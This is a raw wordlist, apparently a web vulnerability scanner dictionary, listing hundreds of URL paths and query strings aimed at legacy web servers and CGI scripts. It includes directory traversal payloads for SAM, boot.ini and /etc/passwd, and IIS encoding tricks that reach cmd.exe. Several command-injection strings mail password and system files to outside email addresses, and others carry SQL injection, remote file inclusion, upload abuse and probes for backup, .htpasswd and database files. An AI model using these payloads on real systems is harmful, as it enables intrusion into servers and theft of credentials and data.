###fdkjgzschool.V2009#.asp
%00.nsf/../lotus/domino/notes.ini
%23%23%23fdkjgzschool.V2009%23.asp
%23%23%23fdkjgzschool.V2009%23.aspx
%23%23%23fdkjgzschool.V2009%23.jsp
%23%23%23fdkjgzschool.V2009%23.php
%23TZIMS_Ver6.1.mdb
%23Xgxian_pingshang_071110_v3.01.mdb
%23zxData.project%23.asp
%23zxData.project%23.aspx
%23zxData.project%23.jsp
%23zxData.project%23.mdb
%23zxData.project%23.php
*.shtml/login.jsp
.""./.""./Perl/eg/core/findtar+&+echo+system(@ARGV);+>+c:InetPubwwwrootcmd.pl+&+.pl
.""./.""./winnt/reapir/sam._%20.pl
."./."./Perl/eg/core/findtar+&+echo+system(@ARGV);+>+c:InetPubwwwrootcmd.pl+&+.pl
."./."./winnt/reapir/sam._%20.pl
."./."./winnt/win.ini%20.php3
.%252e/.%252e/.%252e/winnt/repair/sam._
..
...
....
......
........
............autoexec.bat
........./autoexec.bat
....../autoexec.bat
....../config.sys
......autoexec.bat
......winntrepairsam._
..../config.sys
..../scandisk.log
..../Windows/Admin.pwl
.../.../scandisk.log
../..
../../../../../../../boot.ini
../../../../../../Scandisk.log
../../../../../winnt/repair/sam._
../../../../config.sys
../../../autoexec.bat
../../../scandisk.log
../../../winnt/repair/sam._
../../boot.ini
../../config.sys
../../myServerEXEC-0.2/readme.txt
../../template/shared/indexTemplate.xml
../../windows/user.dat
../../winnt/reapir/sam._%20.pl
../../winnt/win.ini%00examples/jsp/hello.jsp
../admin.asp
../admin.aspx
../admin.jsp
../admin.php
../admin/default.asp
../admin/default.aspx
../admin/default.jsp
../admin/default.php
../admin/index.asp
../admin/index.aspx
../admin/index.jsp
../admin/index.php
../admin/login.asp
../admin/login.aspx
../admin/login.jsp
../admin/login.php
../admin/manage.asp
../admin/manage.aspx
../admin/manage.jsp
../admin/manage.php
../admin/shopbackup.mdb
../readme.txt
../scandisk.log
..default
..default.asp
..default.aspx
..default.jsp
..default.php
..index
..index.asp
..index.aspx
..index.jsp
..index.php
..login
..login.asp
..login.aspx
..login.jsp
..login.php
..manage
..manage.asp
..manage.aspx
..manage.jsp
..manage.php
./WEB-INF/web.xml
.acf/.members
.adminpass.txt
.box/../winnt/win.ini
.cobalt/sysManage/../admin/.htaccess
.dbusers.db
.HTACCESS.
.htmaster/password.htpasswd
.html/......
.html/............../config.sys
.html/............./config.sys
.html/............/autoexec.bat
.htpass-4.new
.htpasswd.aknk
.htpasswd.AKNK
.htpasswd.nten
.htpasswd.NTEN
.htpasswd.slez
.htpasswd.SLEZ
.jsp/web-inf/classes/env.java
.jsp/WEB-INF/classes/Env.java
.ns4/../winnt/win.ini
.nsf/../lotus/domino/notes.ini
.nsf/../winnt/win.ini
.passwd.db
.photon/voyager/config.full
.userid.pwd
.webpass_members.
.www.my.cnf
:8080/.jsp/WEB-INF/classes/Env.java
_mem_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe
_privat/.htpass-4.new
_privat/.htpasswd.aknk
_privat/.htpasswd.nten
_privat/.htpasswd.slez
_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:orderinfo.txt
_vti_bin/..%2f..%2f..%2f..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe
_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe
_vti_bin/..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe
_vti_bin/fpcount.exe?page=default.asp|image=2|digits=1
_vti_bin/fpcount.exe?page=default.aspx|image=2|digits=1
_vti_bin/fpcount.exe?page=default.htm|image=2|digits=1
_vti_bin/fpcount.exe?Page=default.htm|Image=2|Digits=1
_vti_bin/fpcount.exe?page=default.jsp|image=2|digits=1
_vti_bin/fpcount.exe?page=default.php|image=2|digits=1
_vti_bin/shtml.dll/nosuch.asp
_vti_bin/shtml.dll/nosuch.aspx
_vti_bin/shtml.dll/nosuch.htm
_vti_bin/shtml.dll/nosuch.jsp
_vti_bin/shtml.dll/nosuch.php
_vti_bin/shtml.dll/tstt.htm
_vti_cnf/..%2f..%2f..%2f..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe
_vti_cnf/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe
_vti_cnf/..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe
~rollo/members/.htpass-4.new
~rollo/members/.htpasswd.aknk
~rollo/members/.htpasswd.nten
~rollo/members/.htpasswd.slez
~rollo/members/dmr/.htpasswd.ass
200|500->HEAD:/data/sdbbs.ful.cn.asp
216.2.8.114
4DBin/_/../boot.ini
4DBin/_/../inetpub/../boot.ini
4DBin/_/../winnt/repair/sam._
4DBin/_/C:/inetpub/../boot.ini
6346/........../windows/win.ini
80/../../../autoexec.bat
8000/./WEB-INF/web.xml
8000/servlet/com.endymion.sake.servlet.mail.MailServlet?
8000/servlet/com.livesoftware.jrun.plugins.jsp.JSP/../../../tst.txt
8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../test.jsp
8000/servlet/jsp/../../tst.txt
8000/servlet/ssifilter/../../test.jsp
8002/Newuser?Image=../../database/rbsserv.mdb
8010/Guide/../../../../../../../../../../../var/CommuniGate/Accounts/postmaster.macnt/account.settings
8080/../../../conf/Eserv.ini
8080/../../winnt/win.ini%00examples/jsp/hello.jsp
8080/../readme.txt
8080/../ssd.ini
8080/.jsp/WEB-INF/classes/Env.java
8080/servlet/org.apache.catalina.servlets.DefaultServlet/index.jsp
81/.cobalt/sysManage/../admin/.htaccess
9090/servlet/com.sun.server.http.pagecompile.jsp92.JspServlet/board.html
a.asp/..%c1%1c../..%c1%1c../winnt/win.ini
a.jsp............/winnt/win.ini
a.jsp/../../../../../../winnt/win.ini
access/.dbusers.db
access/.htpass-4.new
access/.htpasswd.aknk
access/.htpasswd.nten
access/.htpasswd.NTEN
access/.htpasswd.slez
access/.htpasswd~log/access.log
access/dmr/.htpasswd.ass
access0/.htpasswd~logs/access.log
access7/.htpasswd.NTEN
access8/.htpasswdlog/access.log
access9/.htpasswd~log/access.log
acctman/info/.htpass-4.new
acctman/info/.htpasswd.aknk
acctman/info/.htpasswd.nten
acctman/info/.htpasswd.slez
achievo/atk/javascript/class.atkdateattribute.js.php?config_atkroot=anotherhostfilewithcmd
admin.asp.bak
admin.aspx.bak
admin.jsp.bak
admin.php.bak
admin.php?upload=1&file=config.php&file_name=tmp.txt&wdir=/images/&userfile=config.php&userfile_name=tmp.txt
admin/.dbusers.db
admin/admin_login.asp.bak
admin/admin_login.asp.bk
admin/admin_login.aspx.bak
admin/admin_login.aspx.bk
admin/admin_login.jsp.bak
admin/admin_login.jsp.bk
admin/admin_login.php.bak
admin/admin_login.php.bk
admin/admin_login.pl.bak
admin/admin_login.pl.bk
admin/case/case.filemanager.php/admin.php?op=move&confirm=1&do=copy&basedir=&file=/tmp/dat.dat&newfile=done.php
admin/chinaz.com.txt
admin/config.inc.asp
admin/conn.asp.bak
admin/conn.inc.asp
admin/db/.htpass-4.new
admin/db/.htpasswd.aknk
admin/db/.htpasswd.nten
admin/db/.htpasswd.slez
admin/edit/admin_uploadfile.asp?id=14&dir=..
admin/editor/admin_uploadfile.asp?id=14&dir=..
admin/eweb/admin_uploadfile.asp?id=14&dir=..
admin/ewebeditor/admin_uploadfile.asp?id=14&dir=..
admin/fckeditor/editor/fckeditor.original.html
admin/FCKeditor/editor/filemanager/browser/default/browser.asp?Type=all&Connector=connectors/asp/connector.asp
admin/fckeditor/editor/filemanager/browser/default/browser.asp?Type=Image&Connector=connectors/asp/connector.asp
admin/FCKeditor/editor/filemanager/browser/default/browser.aspx?Type=all&Connector=connectors/asp/connector.aspx
admin/fckeditor/editor/filemanager/browser/default/browser.aspx?Type=Image&Connector=connectors/asp/connector.aspx
admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.asp
admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp
admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.aspx
admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.php
admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/aspx/connector.aspx
admin/FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=../../connectors/aspx/connector.aspx
admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.aspx
admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.php
admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/aspx/connector.aspx
admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/php/connector.php
admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=monyer&Connector=connectors/asp/connector.asp
admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=monyer&Connector=connectors/aspx/connector.aspx
admin/FCKeditor/editor/filemanager/browser/default/browser.jsp?Type=all&Connector=connectors/asp/connector.jsp
admin/fckeditor/editor/filemanager/browser/default/browser.jsp?Type=Image&Connector=connectors/asp/connector.jsp
admin/FCKeditor/editor/filemanager/browser/default/browser.php?Type=all&Connector=connectors/asp/connector.php
admin/fckeditor/editor/filemanager/browser/default/browser.php?Type=Image&Connector=connectors/asp/connector.php
admin/login.asp.bak
admin/login.asp.bk
admin/login.aspx.bak
admin/login.aspx.bk
admin/login.jsp.bak
admin/login.jsp.bk
admin/login.php.bak
admin/login.php.bk
admin/login.pl.bak
admin/login.pl.bk
admin/sou.../southidceditor.mdb
admin/test.asp/info.asp
admin/test.aspx/info.aspx
admin/test.jsp/info.jsp
admin/test.php/info.php
admin/upfile.phpadmin/upfile_flash.php
admin/upload.asp?picName=st999.asp
admin/uploadPic.asp?actionType=mod&picName=miao.asp
admin/uploadPic.asp?language=&editImageNum=0&editRemNum=1.asp;41513102009204012
admin/uploadPic.aspx?actionType=mod&picName=miao.aspx
admin/uploadPic.inc.asp
admin/uploadPic.jsp?actionType=mod&picName=miao.jsp
admin/uploadPic.php?actionType=mod&picName=miao.php
admin/WEB-INF/classes/ContextAdmin.java/x00.jsp
admin_admin.asp.bak
admin_admin.aspx.bak
admin_admin.jsp.bak
admin_admin.php.bak
admin_chklogin.asp.bak
admin_chklogin.aspx.bak
admin_chklogin.jsp.bak
admin_chklogin.php.bak
admin_config.asp.bak
admin_config.aspx.bak
admin_config.jsp.bak
admin_config.php.bak
admin_data.asp.bak
admin_data.aspx.bak
admin_data.jsp.bak
admin_data.php.bak
admin_index.asp.bak
admin_index.aspx.bak
admin_index.jsp.bak
admin_index.php.bak
admin_login.asp.bak
admin_login.asp.bk
admin_login.aspx.bak
admin_login.aspx.bk
admin_login.jsp.bak
admin_login.jsp.bk
admin_login.php.bak
admin_login.php.bk
admin_login.pl.bak
admin_login.pl.bk
admin_main.asp.bak
admin_main.aspx.bak
admin_main.jsp.bak
admin_main.php.bak
admin_menu.asp.bak
admin_menu.aspx.bak
admin_menu.jsp.bak
admin_menu.php.bak
admin_t/include/aff_liste_langue.php?rep_include=myhost_with_para_langue.php
admin_uploadfile.asp?id=14&dir=..
admin_uploadfile.asp?id=14&dir=../../..
admin_uploadfile.aspx?id=14&dir=../../..
admin_uploadfile.php?id=14&dir=../../..
adminuploadPic.asp?actionType=mod&picName=miao.asp
adminuploadPic.aspx?actionType=mod&picName=miao.aspx
adminuploadPic.jsp?actionType=mod&picName=miao.jsp
adminuploadPic.php?actionType=mod&picName=miao.php
adult/members/.htpass-4.new
adult/members/.htpasswd.aknk
adult/members/.htpasswd.nten
adult/members/.htpasswd.slez
Album/?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
amateurs/.htpass-4.new
amateurs/.htpasswd.aknk
amateurs/.htpasswd.nten
amateurs/.htpasswd.slez
amateurs/dmr/.htpasswd.ass
ana-bin/sitehtpass/.htpass-4.new
ana-bin/sitehtpass/.htpasswd.aknk
ana-bin/sitehtpass/.htpasswd.nten
ana-bin/sitehtpass/.htpasswd.slez
App_Data/App_Data.mdb.bak
App_Data/data.mdb.bak
App_Data/database.mdb.bak
App_Data/db.mdb.bak
arginc/.htpass-4.new
ats/logs/.htpass-4.new
ats/logs/.htpasswd.aknk
ats/logs/.htpasswd.nten
ats/logs/.htpasswd.slez
auth/.htpass-4.new
auth/.htpasswd.aknk
auth/.htpasswd.nten
auth/.htpasswd.slez
auth/dmr/.htpasswd.ass
auth/livesex.passwd.db
auth/members/.htpass-4.new
auth/members/.htpasswd.aknk
auth/members/.htpasswd.nten
auth/members/.htpasswd.slez
avatar.php?img=../secret/connect.php
banners.php?op=Change^/banners.php?op=Change
bb.sqljsp............/winnt/win.ini
bb.sqljsp/../../../../../../winnt/win.ini
bin/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe
bin/.dbusers.db
bin/ccbill/.dbusers.db
bin/dmr/.dbusers.db
bin/epoch/.dbusers.db
bin/epochp/.dbusers.db
bin/mastergate/.dbusers.db
bin/netbilling/.dbusers.db
bin/webcash/.dbusers.db
bin/wwwjoin/.dbusers.db
book/inc/conn.asp.bak
book/inc/conn.aspx.bak
book/inc/conn.jsp.bak
book/inc/conn.php.bak
browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=aspx.asp
caspsamp/codebrws.asp?source=/caspsamp/../admin/conf/service.pwd
caspsamp/codebrws.asp?source=/caspsamp/../admin/conf/service.pwdsource=/caspsamp/../admin/conf/service.pwd
caspsamp/codebrws.asp?source=/caspsamp/../global_odbc.ini
caspsamp/codebrws.asp?source=/caspsamp/../global_odbc.inisource=/caspsamp/../global_odbc.ini
caspsamp/codebrws.asp?source=/caspsamp/../LICENSE.LIC
caspsamp/codebrws.asp?source=/caspsamp/../LICENSE.LICsource=/caspsamp/../LICENSE.LIC
ccbil/cgibin/ibp/search.cgi/.freshteen
ccbill/.dbusers.db
ccbill/.htpass-4.new
ccbill/.htpasswd.aknk
ccbill/.htpasswd.nten
ccbill/.htpasswd.slez
ccbill/dmr/.htpasswd.ass
ccbill/male/password/.htpass-4.new
ccbill/male/password/.htpasswd.aknk
ccbill/male/password/.htpasswd.nten
ccbill/male/password/.htpasswd.slez
ccbill/members/.htpass-4.new
ccbill/members/.htpasswd.aknk
ccbill/members/.htpasswd.nten
ccbill/members/.htpasswd.slez
ccbill/members/dmr/.htpasswd.ass
ccbill/password/.htpass-4.new
ccbill/password/.htpasswd.aknk
ccbill/password/.htpasswd.nten
ccbill/password/.htpasswd.slez
ccbill/password/dmr/.htpasswd.ass
ccbill/secure/.htpass-4.new
ccbill/secure/.htpasswd.aknk
ccbill/secure/.htpasswd.nten
ccbill/secure/.htpasswd.slez
ccbill/secure/dmr/.htpasswd.ass
cd/../config/html/cnf_gi.htm
cfdocs/exampleapp/email/getfile.cfm?filename=c:/boot.ini
cfdocs/exampleapp/email/getfile.cfm?filename=c:boot.ini
cfdocs/exampleapp/publish/admin/application.cfm1/cfdocs/exampleapp/email/application.cfm
cfdocs/examples/CVLibrary/GetFile.CFM?FT=Text&FST=Plain&FilePath=C:/boot.ini
cfdocs/examples/CVLibrary/GetFile.CFM?FT=Text&FST=Plain&FilePath=C:boot.ini
cfdocs/expeval/exprcalc.cfm?openfilepath=c:/winnt/repair/sam._
cfdocs/expeval/exprcalc.cfm?openfilepath=c:winntrepairsam._
cgi/.dbusers.db
cgi/ccbill/.dbusers.db
cgi/commerce.cgi?page=../../../../etc/hosts%00index.html
cgi/dmr/.dbusers.db
cgi/epoch/.dbusers.db
cgi/epochp/.dbusers.db
cgi/mastergate/.dbusers.db
cgi/netbilling/.dbusers.db
cgi/webcash/.dbusers.db
cgi/wwwjoin/.dbusers.db
cgi-bin/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe
cgi-bin/.adminpass.txt
cgi-bin/.cobalt/siteUserMod.cgi
cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi
cgibin/.dbusers.db
cgi-bin/.dbusers.db
cgibin/.htpass-4.new
cgi-bin/.htpass-4.new
cgibin/.htpasswd.aknk
cgi-bin/.htpasswd.aknk
cgibin/.htpasswd.nten
cgi-bin/.htpasswd.nten
cgibin/.htpasswd.slez
cgi-bin/.htpasswd.slez
cgi-bin/.www.my.cnf
cgi-bin/am/codes/.htpass-4.new
cgi-bin/am/codes/.htpasswd.aknk
cgi-bin/am/codes/.htpasswd.nten
cgi-bin/am/codes/.htpasswd.slez
cgi-bin/am/codes/dmr/.htpasswd.ass
cgi-bin/awl/auctionweaver.pl?flag1=1&catdir=................&fromfile=Boot.ini
cgi-bin/awl/auctionweaver.pl?flag1=1&catdir=/../../../../../../../../&fromfile=Boot.ini
cgi-bin/bbs_forum.cgi?forum=test&read=../bbs_forum.cgi
cgi-bin/bizdb1-search.cgi?template=bizdb-summary&dbname=;ls|mail%20riotnation@hotmail.com|&f6=
cgi-bin/bizdb1-search.cgi?template=bizdb-summary&dbname=;ls|mail%20swoopme@@hotmail.com|&f6=
cgi-bin/CatalogMgr.pl?cartID=366&template=CatalogMgr.pl
cgibin/ccbill/.dbusers.db
cgi-bin/ccbill/.dbusers.db
cgi-bin/ccPass.pl.bak
cgi-bin/CGImail.exe?%24Attach%24=file.txt&%24To%24=swoopme@hotmail.com
cgi-bin/commerce.cgi?page=../../../../etc/hosts%00index.html
cgi-bin/cvsweb/src/usr.bin/rdist/expand.c
cgi-bin/data/.adminpass.txt
cgi-bin/database/.htpass-4.new
cgi-bin/database/.htpasswd.aknk
cgi-bin/database/.htpasswd.nten
cgi-bin/database/.htpasswd.slez
cgi-bin/database/dmr/.htpasswd.ass
cgi-bin/db2www.exe/../../db2www.ini
cgi-bin/db2www/../../db2www.ini
cgi-bin/db2www/library/document.d2w/report?uid=UNKNOWN&pwd=&search_type=SIMPLE&r_host=&last_page=db2www0022.html&fn=db2www.html
cgibin/dmr/.dbusers.db
cgi-bin/dmr/.dbusers.db
cgibin/dmr/.htpasswd.ass
cgi-bin/dmr/.htpasswd.ass
cgi-bin/edittag/edittag.cgi?file=%2F..%2F..%2F..%2F..%2F..%2Fetc%2fhosts
cgibin/epoch/.dbusers.db
cgi-bin/epoch/.dbusers.db
cgibin/epochp/.dbusers.db
cgi-bin/epochp/.dbusers.db
cgi-bin/everythingform.cgi?config=../../../../../../../../bin/ping&Name=xx&e-mail=riotnation@hotmail.com
cgi-bin/everythingform.cgi?config=../../../../../../../../bin/ping&Name=xx&e-mail=swoopme@hotmail.com
cgi-bin/finger?tiedotus@uta.fi%3B%2Fbin%2Fmail+riotnation@hotmail.com+%3C+etc%2Fpasswd
cgi-bin/formprocessor.asp?MailTo=riotnation@hotmail.com&MailFrom=tst@no.net&Message=tst&MailTemplate1=/cgi-bin/formprocessor.asp
cgi-bin/formprocessor.asp?MailTo=swoopme@hotmail.com&MailFrom=tst@no.net&Message=tst&MailTemplate1=/cgi-bin/formprocessor.asp
cgi-bin/form-to-mail.cgi?_out_file=mungo.dat&x=y
cgi-bin/fratboys/.htpass-4.new
cgi-bin/fratboys/.htpasswd.aknk
cgi-bin/fratboys/.htpasswd.nten
cgi-bin/fratboys/.htpasswd.slez
cgi-bin/fratboys/dmr/.htpasswd.ass
cgi-bin/guestserver.cgi?email=|ls|swoopme@hotmail.com
cgi-bin/hello.exe?aaaaaaaaaaaaaaaaaaaa...ax224
cgi-bin/hpnst.exe?c=p+i=SrvSystemInfo.html
cgi-bin/ib/data/.htpass-4.new
cgi-bin/ib/data/.htpasswd.aknk
cgi-bin/ib/data/.htpasswd.nten
cgi-bin/ib/data/.htpasswd.slez
cgi-bin/ib/data/dmr/.htpasswd.ass
cgibin/ibp5/.htpass-4.new
cgibin/ibp5/.htpasswd.aknk
cgibin/ibp5/.htpasswd.nten
cgibin/ibp5/.htpasswd.slez
cgibin/ibp5/dmr/.htpasswd.ass
cgi-bin/ion-p.exe?page=c:/boot.ini
cgi-bin/leave-link.cgi?file=mungo.dat&url=hoschi.net
cgi-bin/mailfile.cgi?real_name=rc&email=riotnation@hotmail.com&filename=mailfile.cgi
cgi-bin/mailfile.cgi?real_name=rc&email=swoopme@hotmail.com&filename=mailfile.cgi
cgi-bin/mailfile?MailTo=riotnation@hotmail.com&FileName=mailfile:c&Subject=tst&MailFrom=tst@no.net
cgi-bin/mailfile?MailTo=swoopme@hotmail.com&FileName=mailfile:c&Subject=tst&MailFrom=tst@no.net
cgi-bin/main.cgi/oops?board=FREE_BOARD&command=down_load&filename=/../../../main.cgi
cgibin/mastergate/.dbusers.db
cgi-bin/mastergate/.dbusers.db
cgibin/mastergate/.htpass-4.new
cgi-bin/mastergate/.htpass-4.new
cgibin/mastergate/.htpasswd.aknk
cgi-bin/mastergate/.htpasswd.aknk
cgibin/mastergate/.htpasswd.nten
cgi-bin/mastergate/.htpasswd.nten
cgibin/mastergate/.htpasswd.slez
cgi-bin/mastergate/.htpasswd.slez
cgibin/mastergate/dmr/.htpasswd.ass
cgi-bin/mastergate/dmr/.htpasswd.ass
cgibin/members/htdata/.htpass-4.new
cgibin/members/htdata/.htpasswd.aknk
cgibin/members/htdata/.htpasswd.nten
cgibin/members/htdata/.htpasswd.slez
cgibin/members/htdata/dmr/.htpasswd.ass
cgibin/netbilling/.dbusers.db
cgi-bin/netbilling/.dbusers.db
cgi-bin/newsdesk.cgi?t=../pass.txt
cgi-bin/NUL/../../../../WINNT/system32/ipconfig.exe+HTTP/1.0
cgi-bin/passwd/.htpass-4.new
cgi-bin/passwd/.htpasswd.aknk
cgi-bin/passwd/.htpasswd.nten
cgi-bin/passwd/.htpasswd.slez
cgi-bin/passwd/dmr/.htpasswd.ass
cgi-bin/perl.exe?fmh.pl
cgi-bin/pollit/Poll_It_SSI_v2.0.cgi
cgi-bin/postings.cgi?action=reply&forum=&number=1&topic=000001.cgi&topicsubject=&replyto=0
cgi-bin/postings.cgi?action=reply&forum=&number=1&topic=000001.cgi&TopicSubject=&replyto=0
cgi-bin/postings.cgi?action=reply&forum=&number=1&topic=000001.cgi&TopicSubject=&replyto=0action=reply&forum=&number=1&topic=000001.cgi&TopicSubject=&replyto=0
cgi-bin/powerup/r.cgi?FILE=main.html
cgi-bin/powerup/r.pl?FILE=main.html
cgi-bin/quikstore.cgi?page=../quikstore.cgi%00html&cart_id=
cgi-bin/replicator/webpage.cgi/313373/ukr.asp
cgi-bin/replicator/webpage.cgi/313373/ukr.aspx
cgi-bin/replicator/webpage.cgi/313373/ukr.htm
cgi-bin/replicator/webpage.cgi/313373/ukr.jsp
cgi-bin/replicator/webpage.cgi/313373/ukr.php
cgi-bin/revshare/joinpage.cgi?p=join-ibill.html
cgi-bin/s.cgi?q=a&tmpl=check^/cgi-bin/s.cgi?q=a&tmpl=check
cgi-bin/scripts/cart.pl?db|cart.pl|All%20Items
cgi-bin/search.pl?form=search.pl%00
cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:/boot.ini
cgi-bin/sgdynamo.exe?HTNAME=default.htm
cgi-bin/shopper.exe?key=&20&preadd=action&template=order.log
cgi-bin/shopper.exe?search=action&keywords=%20&template=order.log
cgi-bin/simplestmail.cgi?redirect=www.ibm.com&MyEmail=riotnation@hotmail.com;ls%20-alsi&submit=run
cgi-bin/simplestmail.cgi?redirect=www.ibm.com&MyEmail=swoopme@hotmail.com;ls%20-alsi&submit=run
cgi-bin/store.cgi?startid=../etc/hosts%00.asp
cgi-bin/store.cgi?startid=../etc/hosts%00.aspx
cgi-bin/store.cgi?startid=../etc/hosts%00.html
cgi-bin/store.cgi?StartID=../etc/hosts%00.html
cgi-bin/store.cgi?StartID=../etc/hosts%00.html/cgi-bin/ipf/etc/gfw/ui/pwd.dat
cgi-bin/store.cgi?startid=../etc/hosts%00.jsp
cgi-bin/store.cgi?startid=../etc/hosts%00.php
cgi-bin/store.cgi?startid=../etc/passwd%00.asp
cgi-bin/store.cgi?startid=../etc/passwd%00.aspx
cgi-bin/store.cgi?startid=../etc/passwd%00.html
cgi-bin/store.cgi?startid=../etc/passwd%00.jsp
cgi-bin/store.cgi?startid=../etc/passwd%00.php
cgi-bin/store/agora.cgi?page=hoschi.html
cgi-bin/tst.bat|type%20c:/file.txt
cgi-bin/UltraBoard/UltraBoard.cgi?Action=PrintableTopic&Post=../../UBData/Members/members.grp%00&Board=6210&Idle=10&Sort=0&Order=Descend&Page=0&Session=
cgi-bin/UltraBoard/UltraBoard.pl?Action=PrintableTopic&Post=../../UBData/Members/members.grp%00&Board=6210&Idle=10&Sort=0&Order=Descend&Page=0&Session=
cgi-bin/user_info.php3?user_username=''+or+admin_level=2+or+username%3d'x'+and+users.id=access.user_id;%00
cgi-bin/way-board.cgi?db=way-board.cgi%00
cgi-bin/way-board/way-board.cgi?db=way-board.cgi%00
cgi-bin/webbbs/webbbs_config.pl?followup=|id|&name=100&email=ldf@lasf.net&subject=dd&body=dla
cgibin/webcash/.dbusers.db
cgi-bin/webcash/.dbusers.db
cgi-bin/webdist.cgi?/bin/mail%20:/etc/passwd[me@myhost.com]
cgi-bin/webplus.cgi?script=/webplus/webping/webping.wml
cgi-bin/webplus.cgi?Script=/webplus/webping/webping.wml
cgi-bin/webspirs.cgi?sp.nextform=webspirs.cgi
cgi-bin/windmail.exe?-n%20c:/boot.ini%20riotnation@hotmail.com
cgi-bin/windmail.exe?-n%20c:/boot.ini%20swoopme@@hotmail.com
cgi-bin/windmail.exe?-n%20c:boot.ini%20swoopme@@hotmail.com
cgi-bin/wwwi32.exe/[in=c:/boot.ini]
cgibin/wwwjoin/.dbusers.db
cgi-bin/wwwjoin/.dbusers.db
cgi-bin2/.htpasswd.nten
cgi-bin2/.htpasswd.slez
cgi-bin2/ampro/info/.htpass-4.new
cgi-bin2/ampro/info/.htpasswd.aknk
cgi-bin2/ampro/info/.htpasswd.nten
cgi-bin2/ampro/info/.htpasswd.slez
cgi-bin2/ampro/info/dmr/.htpasswd.ass
cgi-bin2/MsmMask.exe?mask=/file.ext
cgi-win/.dbusers.db
cgi-win/ccbill/.dbusers.db
cgi-win/dmr/.dbusers.db
cgi-win/epoch/.dbusers.db
cgi-win/epochp/.dbusers.db
cgi-win/mastergate/.dbusers.db
cgi-win/netbilling/.dbusers.db
cgi-win/webcash/.dbusers.db
cgi-win/wwwjoin/.dbusers.db
chinaz.com.txt
ciwebhitsfile=/../../winnt/system32/config/system.log&cirestriction=none&cihilitetype=full
ckfinder/ckfinder.html?action=js&func=SetFileField&data=xPicture&thumbFunc=ShowThumbnails&start=Images.asp%3A%2F%3A0
club/.htpass-4.new
club/.htpasswd.aknk
club/.htpasswd.nten
club/.htpasswd.slez
club/dmr/.htpasswd.ass
clubjoey/.htpass-4.new
clubjoey/.htpasswd.aknk
clubjoey/.htpasswd.nten
clubjoey/.htpasswd.slez
clubjoey/dmr/.htpasswd.ass
code.asp.bak
code.aspx.bak
code.jsp.bak
code.php.bak
cohfmembers/.htpass-4.new
cohfmembers/.htpasswd.aknk
cohfmembers/.htpasswd.nten
cohfmembers/.htpasswd.slez
cohfmembers/dmr/.htpasswd.ass
coloradogirls/members/.htpass-4.new
coloradogirls/members/.htpasswd.aknk
coloradogirls/members/.htpasswd.nten
coloradogirls/members/.htpasswd.slez
coloradogirls/members/dmr/.htpasswd.ass
config.asp.bak
config.aspx.bak
config.inc.asp
config.inc.aspx
config.inc.jsp
config.inc.php
config.jsp.bak
config.php.bak
conn.asp.bak
conn.asp.bk
conn.aspx.bak
conn.aspx.bk
conn.inc.asp
conn.inc.bak
conn.inc.bk
conn.jsp.bak
conn.jsp.bk
conn.php.bak
conn.php.bk
conn/conn.asp.bak
conn/conn.inc.asp
conn/upload.asp?picName=st999.asp
connection.asp.bak
connection.aspx.bak
connection.jsp.bak
connection.php.bak
content_areas/.htpasswd.NTEN
content_areas/access/.htpasswd.NTEN
content_areas/access7/.htpasswd.NTEN
content_areas/dmr/.htpasswd.NTEN
content_areas/epoch/.htpasswd.NTEN
content_areas/log/.htpasswd.NTEN
content_areas/main/.htpasswd.NTEN
content_areas/members/.htpasswd.NTEN
content_areas/online/.htpasswd.NTEN
content_areas/private/.htpasswd.NTEN
content_areas/restricted/.htpasswd.nten
content_areas/restricted/.htpasswd.NTEN
content_areas/secure/.htpasswd.NTEN
content_areas/vcafeeds/.htpasswd.NTEN
content_areas/work/.htpasswd.NTEN
control/.htpass-4.new
control/.htpasswd.aknk
control/.htpasswd.nten
control/.htpasswd.slez
control/dmr/.htpasswd.ass
counter.inc.bak
counter.inc.bk
cp/rac/nsManager.cgi?Domain=nothing.org&IP=127.0.0.1&OP=add&Language=english&Submit=Confirm
cutenews/comments.php?cutepath=anotherhost_with_config.php_or_news.txt
cutenews/search.php?cutepath=anotherhost_with_config.php_or_news.txt
cutenews/shownews.php?cutepath=anotherhost_with_config.php_or_news.txt
CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config
Data.project/%23zxData.project%23.asp
Data.project/%23zxData.project%23.aspx
Data.project/%23zxData.project%23.jsp
Data.project/%23zxData.project%23.mdb
Data.project/%23zxData.project%23.php
Data/%23%23DatalaoY2.3.mdb
data/.adminpass.txt
data/.dbusers.db
data/.htpass-4.new
data/.htpasswd.aknk
data/.htpasswd.nten
data/.htpasswd.slez
data/db.asp.bak
data/dmr/.htpasswd.ass
data/Joekoe_CMS_4.0.mdb
data/oblog4.60.mdb
Data/oblog4.60.mdb
